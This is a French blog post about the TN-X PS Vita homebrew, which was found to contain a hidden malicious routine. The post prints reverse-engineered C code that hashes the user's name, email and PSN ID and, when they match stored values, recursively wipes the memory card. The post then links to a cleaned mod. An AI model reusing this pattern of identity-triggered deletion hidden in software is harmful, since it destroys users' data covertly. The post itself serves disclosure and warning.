<p style="text-align: justify;">Les deux versions sont ainsi concernées, et bien qu'elles ne semblent affecter que <strong>The Zett</strong>, il est tout à fait possible qu'un imprévu se déclenche et que la mauvaise personne soit attaquée. Pensez par exemple aux <em>Gateway</em>, ces <em>linkers </em>3DS, qui peuvent <em>bricker</em> une console à cause de leur mesure anti-clonage... Soyez donc vigilent, et éteignez directement le programme si vous tombez sur un écran rouge avant de le supprimer définitivement de votre carte mémoire.</p>
<p style="text-align: justify;"><div class="mks_toggles"><div class="mks_toggle"><div class="mks_toggle_heading">Code malveillant du TN-X<i class="fa fa-plus"></i><i class="fa fa-minus"></i></div><div class="mks_toggle_content">
<pre class="lang:default decode:true " title="TN-X malicious code">//popcorn.prx reverse
 
const char * username; //10472
const char * email; //10673
const char * psn_id; //10689
 
int remove(const char * path) //sub_000000F8
{
        char buffer[256];
        SceIoDirent entry;
        SceUID dir&nbsp;=&nbsp;sceIoDopen(path);
 
        if(dir &lt; 0)
                sceIoRemove(path);
        else
        {
                memset(&amp;entry, 0, sizeof(SceIoDirent));
                while(sceIoDread(dir, &amp;entry) &gt;= 0)
                {
                        if(entry.d_name[0]&#8239;!= '.')
                        {
                                sprintf(buffer, "%s/%s", path, entry.d_name);
                                remove(buffer);
                        };
                       
                        memset(&amp;entry, 0, sizeof(SceIoDirent));
                };
               
                sceIoDclose(dir);
                sceIoRmdir(path);
        };
       
        return 0;
};
 
void break_zett() //sub_000001D4
{
        static const char sha_1[20]&nbsp;=&nbsp;{0xB7, 0xC1, 0xBC, 0xFF, 0x2A, 0x4C, 0x2F, 0x43, 0xAC, 0x12, 0xA6, 0x22, 0xB7, 0x0A, 0x80, 0xF3, 0xF3, 0xEC, 0x25, 0x0C}; //7620
        static const char sha_2[20]&nbsp;=&nbsp;{0xDD, 0xD0, 0x06, 0xD4, 0x7C, 0x13, 0x61, 0x92, 0xBD, 0xD4, 0x17, 0x8F, 0xDE, 0x6A, 0xBF, 0x3B, 0x4A, 0x1D, 0x3F, 0xDA}; //7600
        static const char sha_3[20]&nbsp;=&nbsp;{0x24, 0x57, 0x15, 0x9E, 0xD1, 0xD8, 0x13, 0x30, 0x0F, 0xDB, 0xEA, 0x8E, 0xA5, 0x5F, 0xF7, 0xF5, 0x42, 0x50, 0xE1, 0xD8}; //7580
       
        char buffer1[20]; //7876
        char buffer2[20]; //7856
        char buffer3[20]; //7836
       
        sceKernelUtilsSha1Digest(username, strlen(username), buffer1);
        sceKernelUtilsSha1Digest(email, strlen(email), buffer2);
        sceKernelUtilsSha1Digest(psn_id, strlen(psn_id), buffer3);
 
        if(!memcmp(buffer1, sha_1, 20) ||&#8239;!memcmp(buffer2, sha_2, 20) ||&#8239;!memcmp(buffer3, sha_3, 20))
                remove("ms0:");
};</pre>
</div></div></div>
<p style="text-align: justify;">Mais comment diable <strong>Total_Noob</strong> a manigancé tout cela&#8239;? Rien de plus simple&nbsp;: le code (merci à <em><a title="Lien vers le topic de GBOT sur le forum de Wololo" href="http://wololo.net/talk/viewtopic.php?f=56&amp;t=42040" target="_blank" rel="noopener noreferrer">GBOT</a></em> pour l'avoir déniché) commence par vérifier le nom d'utilisateur, l'<em>email</em> et l'ID <em>PlayStation Network</em> (<em>Sony Entertainment Network</em> aujourd'hui) puis supprime tout ce qui se trouve dans "ms0:/" (ligne 51) si l'une des valeurs correspond à celles enregistrées (ligne 50). Au moins, ça n'a l'air de supprimer que les fichiers de la partie "PSP" de la PS Vita, c'est déjà ça. Vous remarquerez le doux nom de la fonction (<em>break_zett<span class="br0">(</span></em><span class="br0"><em>)</em>) au passage... </span></p>
<p style="text-align: justify;"><div align="justify" class="signoff"><i class="fa fa-fw fa-search-plus"></i>Petite précision que je me permets d'inclure ici&nbsp;: il semblerait que <strong>Total_Noob</strong> n'en soit pas à son premier coup, l'un des ses premiers <em>HEN</em> pour PSP 3000/Go en 6.XX se serait basé effectivement sur du code volé à un <em>kernel exploit</em> découvert par quelqu'un d'autre, comme le rapporte <em>n00b81</em> sur le site <a title="PlayStationHaX" href="http://playstationhax.it/" target="_blank" rel="noopener noreferrer"><em>PlaystationHaX</em></a>. On peut donc en déduire qu'il est sans scrupule, d'autant plus qu'à l'époque un site francophone du nom de<em> PSPGen</em> (tiens, ça me dit quelque chose&nbsp;:P) l'aurait soudoyé avec une PS3 et un peu d'argent pour continuer et être averti en premier de ses derniers "travaux". <strong>The Zett</strong> aurait aussi à plusieurs reprises critiqué <strong>Total_Noob</strong>, bien qu'il ait toujours fait l'éloge de ses productions. Bref, à méditer et prendre avec des pincettes...</div>
<h4 style="text-align: justify;"><span style="text-decoration: underline;"><strong>Qwikrazor87, notre sauveur&#8239;!</strong></span></h4>
<p style="text-align: justify;">Je l'ai déjà dit plusieurs fois, mais ce genre d'actes est impardonnable&nbsp;: la réputation de <strong>Total_Noob</strong> en a pris un coup, et un sacré coup même. Bien que le respect que j'avais pour lui est parti s'enfouir sous les icebergs du Pôle Nord, il n'en reste pas moins que le <strong>TN-X</strong> est quand même un logiciel non négligeable.</p>
<p style="text-align: justify;">Heureusement qu'intervient le célèbre <strong>Qwikrazor87</strong>, aka "notre sauveur". Le développeur vient effectivement de mettre en ligne la version <b>TN-X v2 Mod</b> qui assure l'absence de ce code malveillant pouvant faire peur aux plus craintifs et soigneux d'entre nous. Sentez-vous donc enfin respirer et l'esprit léger après toutes ces lignes qui n'ont fait que vous stresser (je ne l'espère pas), et téléchargez donc ce <em>MOD</em> certifié "sans code malveillant et caché ni blacklist" pour évincer tout soupçon de suppression de vos chers fichiers.</p>
<figure id="attachment_188" aria-describedby="caption-attachment-188" style="width: 263px" class="wp-caption aligncenter"><a href="https://www.customprotocol.com/medias/2015/03/FW320-PSOneLoader-TNXv2mod.zip"><img decoding="async" class="wp-image-188 size-full" src="https://www.customprotocol.com/medias/2014/06/Bouton-telecharger.png" alt="Instructions disponibles iciHomebrew non signé" width="263" height="108" /></a><figcaption id="caption-attachment-188" class="wp-caption-text"><strong>TN-X v2 Mod</strong> par <em>Qwikrazor87</em></figcaption></figure>
<p style="text-align: justify;">Merci d'avoir eu le courage d'avoir lu en entier mon dossier, et à très bientôt&#8239;!&#8239;;) </p>
<p style="text-align: justify;"><span style="text-decoration: underline;"><strong>Mise à jour</strong></span>&nbsp;: voici la réponse Total_Noob. Effectivement, la cible n'était autre que <strong>The Zett</strong> d'après ses propos.</p>
<p style="text-align: justify;"><blockquote><p><div align="justify"><em>Mes fichiers ne vérifient que 2 choses<br />En premier lieu, ils vérifient (s'il s'agit de<strong> The Zett</strong>) et ne font qu'afficher un écran rouge sans nuire <br />En second lieu, ils vérifient si la première vérification n'a pas été désactivée <br />Si oui, ils effacent le contenu de la carte mémoire <br />Cela veut donc dire que <strong>The Zett</strong> a utilisé une version modifiée de mon travail, c'est donc de sa faute <br />La version officielle et non modifiée n'est donc censée qu'afficher un écran rouge <br />Souvenez-vous&nbsp;: <em>Dark_AleX</em> avait utilisé une méthode similaire pour vérifier si son code avait été modifié et <em>brickait</em> la PSP si cela s'avérait vrai.</em></div> <small><cite title="Total_Noob">Total_Noob</cite></small></p></blockquote>
<p style="text-align: justify;"><strong>The Zett</strong> n'a pas souhaité répondre publiquement.</p>
<p>L’article <a rel="nofollow" href="https://www.customprotocol.com/le-tn-x-un-malware-bien-cache-patch-disponible/">[MàJ] [Vita] Le TN-X&nbsp;: un malware bien caché (patch disponible)</a> est apparu en premier sur <a rel="nofollow" href="https://www.customprotocol.com">Custom Protocol</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.customprotocol.com/le-tn-x-un-malware-bien-cache-patch-disponible/feed/</wfw:commentRss>
			<slash:comments>9</slash:comments>
		
		
			</item>
	</channel>
</rss>

